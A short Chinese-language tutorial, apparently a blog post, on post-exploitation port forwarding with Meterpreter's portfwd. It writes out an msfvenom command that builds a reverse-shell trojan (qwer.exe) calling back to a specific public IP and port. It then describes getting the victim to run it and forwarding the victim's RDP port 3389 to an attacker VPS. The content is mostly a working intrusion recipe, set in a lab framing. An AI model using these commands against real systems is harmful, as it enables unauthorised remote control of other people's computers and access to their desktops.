基于portfwd端口轉(zhuǎn)發(fā)
0x01 操作步驟
portfwd是一款功能強(qiáng)大的端口轉(zhuǎn)發(fā)工具,內(nèi)置于meterpreter中,也可以自己編譯,
源碼地址:https://github.com/rssnsj/portfwd
靶機(jī):win7
攻擊機(jī):47.242.59.61
公網(wǎng)msf
1、生成木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.242.59.61 lport=777 -f exe -o qwer.exe
打開msf,配置連接,進(jìn)行監(jiān)聽(此處監(jiān)聽端口為777)



將木馬qwer.exe上傳給靶機(jī)win7后打開,成功回彈

0x01 端口轉(zhuǎn)發(fā)
將win7的3389端口轉(zhuǎn)發(fā)到公網(wǎng)vps端口即可連接。這里遠(yuǎn)程時(shí)是公網(wǎng)vps的ip和端口
Portfwd add-l[LPORT] -p[RPORT] -r[RHOST]
連接成功

評(píng)論
圖片
表情
